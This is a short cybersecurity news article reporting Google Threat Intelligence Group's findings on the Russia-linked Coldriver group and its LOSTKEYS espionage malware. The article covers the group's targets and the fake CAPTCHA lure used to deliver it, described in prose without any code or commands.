Russia-linked Coldriver hackers deploy new espionage malware in targeted attacks

Russia-linked Coldriver hackers deploy new espionage malware in targeted attacks

A new cyber-espionage campaign by the Russia-aligned threat actor Coldriver has been deploying a previously unknown malware strain dubbed ‘LOSTKEYS,’ according to a report from Google’s Threat Intelligence Group (GTIG).

Coldriver, also tracked as Callisto, Star Blizzard, and UNC4057, is known for credential theft and data exfiltration, often targeting high-profile geopolitical entities. The group's increasing use of custom malware highlights growing sophistication and persistence in its cyber operations.

Active since late 2023 and observed in targeted attacks as recently as April 2025, LOSTKEYS is designed to steal sensitive files, harvest system information, and exfiltrate details about running processes. Victims include current and former Western government advisors, journalists, NGOs, think tanks, and individuals linked to Ukraine.

“We believe the primary goal of COLDRIVER’s operations is intelligence collection in support of Russia’s strategic interests,” the researchers said. “In a small number of cases, the group has been linked to hack-and-leak campaigns targeting officials in the UK and an NGO.”

GTIG researchers say the attacks begin with a deceptive CAPTCHA-style lure on a fake website, a method similar to the known ClickFix social engineering technique. Victims are tricked into executing a PowerShell command that downloads and launches a multistage payload from a remote server. The final stage executes the LOSTKEYS malware, which is capable of extracting data from specific directories and file types.

While LOSTKEYS has only been selectively deployed, Google also identified older malware artifacts disguised as files related to the Maltego investigation platform. The connection between these early samples and Coldriver remains unclear.

 

Back to the list

Latest Posts

Cyber Security Week in Review: May 9, 2025

Cyber Security Week in Review: May 9, 2025

In brief: SAP zero-day exploited by Chinese hackers, SonicWall patches bugs in its SMA appliances, and more.
9 May 2025
Russia-linked Coldriver hackers deploy new espionage malware in targeted attacks

Russia-linked Coldriver hackers deploy new espionage malware in targeted attacks

LOSTKEYS is designed to steal sensitive files, harvest system information, and exfiltrate details about running processes.
8 May 2025
Russia-aligned operation manipulates audio and images to impersonate experts

Russia-aligned operation manipulates audio and images to impersonate experts

The operation primarily focused on undermining NATO support for Ukraine and spreading false narratives to disrupt domestic politics in EU member states.
7 May 2025